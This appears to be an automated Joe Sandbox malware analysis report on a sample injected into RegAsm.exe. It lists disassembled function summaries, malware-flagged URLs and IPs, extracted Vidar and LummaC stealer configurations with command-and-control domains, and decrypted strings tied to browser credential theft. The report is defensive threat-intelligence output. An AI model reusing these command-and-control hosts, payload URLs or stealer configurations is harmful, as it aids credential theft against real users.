Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 37dbaa0268cbf2ada5dffacc53f7c869e638f864ec3c9fc871bbd034d8c7fbe7
Instruction ID: d63194582937cb5cb417e38bc6341ca414648bd4e8e7c2b269d0cb0d1d60d67f
Opcode Fuzzy Hash: 37dbaa0268cbf2ada5dffacc53f7c869e638f864ec3c9fc871bbd034d8c7fbe7
Instruction Fuzzy Hash: 5A11E371300240AFDB24DE2DD940929B369FF85354714013FF801ABBC2C779EC59C29A

Function 00411ECF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00411EF9

Strings

image/jpeg, xrefs: 00411F21

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID: image/jpeg
API String ID: 2803490479-3785015651
Opcode ID: 04b6093f1ce21ec47e43de049f59f739c90353bdea97014197d9fe560c5bc507
Instruction ID: 04060ffa462c6827595a7c8743660f0a855b5f81da1dcbe8508a431eeacb1807
Opcode Fuzzy Hash: 04b6093f1ce21ec47e43de049f59f739c90353bdea97014197d9fe560c5bc507
Instruction Fuzzy Hash: 3E11A572910108FFCB10CFA5CD848DEBF7AFE05361B21026BEA15A31E0D7759E81D654

Function 0040F128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

Part of subcall function 0042EBA5: std::exception::exception.LIBCMT ref: 0042EBBA
Part of subcall function 0042EBA5: __CxxThrowException@8.LIBCMT ref: 0042EBCF
Part of subcall function 0042EBA5: std::exception::exception.LIBCMT ref: 0042EBE0

Part of subcall function 0040F238: std::_Xinvalid_argument.LIBCPMT ref: 0040F242

_memmove.LIBCMT ref: 0040F190

Strings

invalid string position, xrefs: 0040F139

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 58e0b240644c1769cb393e0a21362c4dcc4106c1de4a7cdb092e49b0460e6533
Instruction ID: e0979300849c9b55eb9bdd4c58de1473e2e17273d4bf5924789ff55d9fa1bf19
Opcode Fuzzy Hash: 58e0b240644c1769cb393e0a21362c4dcc4106c1de4a7cdb092e49b0460e6533
Instruction Fuzzy Hash: 3911E131304210DBDB24EE6CD9809597365AF89324744063BF815EFAC2C33CED4587DA

Function 0040F34D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F35C

Part of subcall function 0042EBA5: std::exception::exception.LIBCMT ref: 0042EBBA
Part of subcall function 0042EBA5: __CxxThrowException@8.LIBCMT ref: 0042EBCF
Part of subcall function 0042EBA5: std::exception::exception.LIBCMT ref: 0042EBE0

memmove.MSVCRT(0040EEBE,0040EEBE,C6C68B00,0040EEBE,0040EEBE,0040F15F,?,?,?,0040F1DF,?,?,?,74DF0440,?,-00000001), ref: 0040F392

Strings

invalid string position, xrefs: 0040F357

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: 78a30c349474654bf225fc08fe1a2cf2509da95a19ab68bbdbeb66a420a532a5
Instruction ID: 2af0ee82bcf48b471d47e6d96a46a9ed599bfe8a651e1a308f0122de73e09d5f
Opcode Fuzzy Hash: 78a30c349474654bf225fc08fe1a2cf2509da95a19ab68bbdbeb66a420a532a5
Instruction Fuzzy Hash: 6E01AD713007018BDB348E7889C491FB6A2EB85B20730493ED882D7B85DB7CE84E8398

Function 00428129 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strcpy_s.MSVCRT ref: 0042813E
__invoke_watson.LIBCMT ref: 00428192

Part of subcall function 00427FCD: _strcat_s.LIBCMT ref: 00427FEC

Strings

,NC, xrefs: 0042817D

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_sstrcpy_s
String ID: ,NC
API String ID: 1132195725-1329140791
Opcode ID: 53b9d3399cf01edd424f01e545b4bf6b1a8555bf483cd13445593f0413521323
Instruction ID: e0f6b6e17a13aa5da5666b1d03995d625f295d1825463f60ebb0021732c8fcec
Opcode Fuzzy Hash: 53b9d3399cf01edd424f01e545b4bf6b1a8555bf483cd13445593f0413521323
Instruction Fuzzy Hash: 35F046726402287FDF116FA1EC43EEF3F69AF00350F88806AF9188A1A2D7369D60C754

Function 00427FCD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

_strcat_s.LIBCMT ref: 00427FEC
__invoke_watson.LIBCMT ref: 00428008

Strings

`8C, xrefs: 00427FDE, 00427FE4

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_s
String ID: `8C
API String ID: 228796091-1339866851
Opcode ID: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
Instruction ID: cad6318fc04680b851dd08df0a3af169b53858a1f5e6ccb7c7d03e7c2ea14cc0
Opcode Fuzzy Hash: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
Instruction Fuzzy Hash: E8E0D8736082197BCF111E56EC4199B771DFFC0368B47043AFE1852101D736D9669695

Function 0041F319 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041F34E
DName::DName.LIBCMT ref: 0041F35A

Strings

{flat}, xrefs: 0041F349

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: 753bec7e79212b105f90b309f12c88ffb57e1f233cab30b7704b4f6d6ab2d326
Instruction ID: 75c6d5a6781f4b936099b417a98164c0e3f9a4e09d0a36b5c7f766f2f23cdc1d
Opcode Fuzzy Hash: 753bec7e79212b105f90b309f12c88ffb57e1f233cab30b7704b4f6d6ab2d326
Instruction Fuzzy Hash: B7F0A0311403089FCB10DF59E845BE87BA1AB85756F088046FC5D0F3A7C774E882C759

Function 0040141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401436
GlobalMemoryStatusEx.KERNEL32(?), ref: 00401449

Strings

@, xrefs: 00401442

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus_memset
String ID: @
API String ID: 587104284-2766056989
Opcode ID: aa93fba72df7e93d13035ac72025dc3419931463db02d6cc3d9065addf0969bb
Instruction ID: 6c286abdd49f980ad9a49cc3251467f02e81772a56e59e7c0de008611c9a175d
Opcode Fuzzy Hash: aa93fba72df7e93d13035ac72025dc3419931463db02d6cc3d9065addf0969bb
Instruction Fuzzy Hash: FCE0B8F19002089BDB14DFA5E956B9DB7F89B08704F500069AA05E7181D674BA098759

Function 6C1B0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C1B0DF5
TlsGetValue.KERNEL32 ref: 6C1B0E2D
TlsGetValue.KERNEL32 ref: 6C1B0E58
TlsGetValue.KERNEL32 ref: 6C1B0E84

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: ca3ddb6a89bd9b47266dbb66bdec1fcdd092d1644052d50f5d00f78baf5f39a0
Instruction ID: bd046417e5cefa6ac32acc6f8bd42c654c750c52aaccc09dfd75c42082692968
Opcode Fuzzy Hash: ca3ddb6a89bd9b47266dbb66bdec1fcdd092d1644052d50f5d00f78baf5f39a0
Instruction Fuzzy Hash: EF31C6F06443818BDB006F7DC68866977B4BF15348F02866DEC98A7A51EB35D485CF82

Function 6C10A4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C10A468,00000000), ref: 6C10A4F9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C10A468,00000000), ref: 6C10A51B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C10A468,?,6C10A468,00000000), ref: 6C10A545
memcpy.VCRUNTIME140(00000001,6C10A468,00000001,?,?,?,6C10A468,00000000), ref: 6C10A57D

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction ID: cdf395ccc6983ac75dbfcc3560dd111ce878d00c0e8ff697515fd5384586e1bd
Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction Fuzzy Hash: 73112CB3E0031597DB0189B9DCC16AB77D9AF55278F290234ED148B7C0FA39D94883E1

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe1kkkkn	Avira URL Cloud: Label: malware
Source: opponnentduei.shop	Avira URL Cloud: Label: malware
Source: https://achievenmtynwjq.shop/	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/nss3.dlllu	Avira URL Cloud: Label: malware
Source: https://116.203.165.127	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exedata;	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/vcruntime140.dlli	Avira URL Cloud: Label: malware
Source: https://puredoffustow.shop/api	Avira URL Cloud: Label: malware
Source: https://quotamkdsdqo.shop/	Avira URL Cloud: Label: malware
Source: https://opponnentduei.shop/api	Avira URL Cloud: Label: malware
Source: quotamkdsdqo.shop	Avira URL Cloud: Label: malware
Source: https://carrtychaintnyw.shop/y	Avira URL Cloud: Label: malware
Source: https://carrtychaintnyw.shop/api	Avira URL Cloud: Label: malware
Source: https://achievenmtynwjq.shop/api	Avira URL Cloud: Label: malware
Source: chickerkuso.shop	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exej$	Avira URL Cloud: Label: malware
Source: https://metallygaricwo.shop/api	Avira URL Cloud: Label: malware
Source: https://genedjestytw.shop/	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/freebl3.dll~t	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe	Avira URL Cloud: Label: malware
Source: https://chickerkuso.shop/api	Avira URL Cloud: Label: malware
Source: https://carrtychaintnyw.shop/	Avira URL Cloud: Label: malware
Source: achievenmtynwjq.shop	Avira URL Cloud: Label: malware
Source: https://quotamkdsdqo.shop/api	Avira URL Cloud: Label: malware
Source: https://116.203.165.127/softokn3.dllS	Avira URL Cloud: Label: malware
Source: https://milldymarskwom.shop/2	Avira URL Cloud: Label: malware

Source: 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "dea7c01007a657ba0c601c941632f140"}
Source: 9.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["puredoffustow.shop", "chickerkuso.shop", "quotamkdsdqo.shop", "metallygaricwo.shop", "milldymarskwom.shop", "carrtychaintnyw.shop", "questionmwq.shop", "opponnentduei.shop", "achievenmtynwjq.shop"], "Build id": "H8NgCl--"}

Source: C:\ProgramData\BAAEHDBFID.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66ecb454d2b4a_lgfdsjgds[1].exe	ReversingLabs: Detection: 26%

Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: carrtychaintnyw.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: quotamkdsdqo.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: milldymarskwom.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: metallygaricwo.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: opponnentduei.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: puredoffustow.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: achievenmtynwjq.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: chickerkuso.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: questionmwq.shop
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: - Screen Resoluton:
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: Workgroup: -
Source: 9.2.RegAsm.exe.400000.0.unpack	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	3_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C19A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	3_2_6C19A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C164420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	3_2_6C164420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C194440 PK11_PrivDecrypt,	3_2_6C194440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1944C0 PK11_PubEncrypt,	3_2_6C1944C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1E25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	3_2_6C1E25B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C19A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	3_2_6C19A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C178670 PK11_ExportEncryptedPrivKeyInfo,	3_2_6C178670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C17E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	3_2_6C17E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1BA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	3_2_6C1BA730

Source: file.exe	Virustotal: Detection: 45%			Perma Link
Source: file.exe	ReversingLabs: Detection: 36%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [esi+0Ch]	9_2_0040F140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-10h]	9_2_004402B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	9_2_004402B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	9_2_00440477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_0043F9B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	9_2_00442EC0
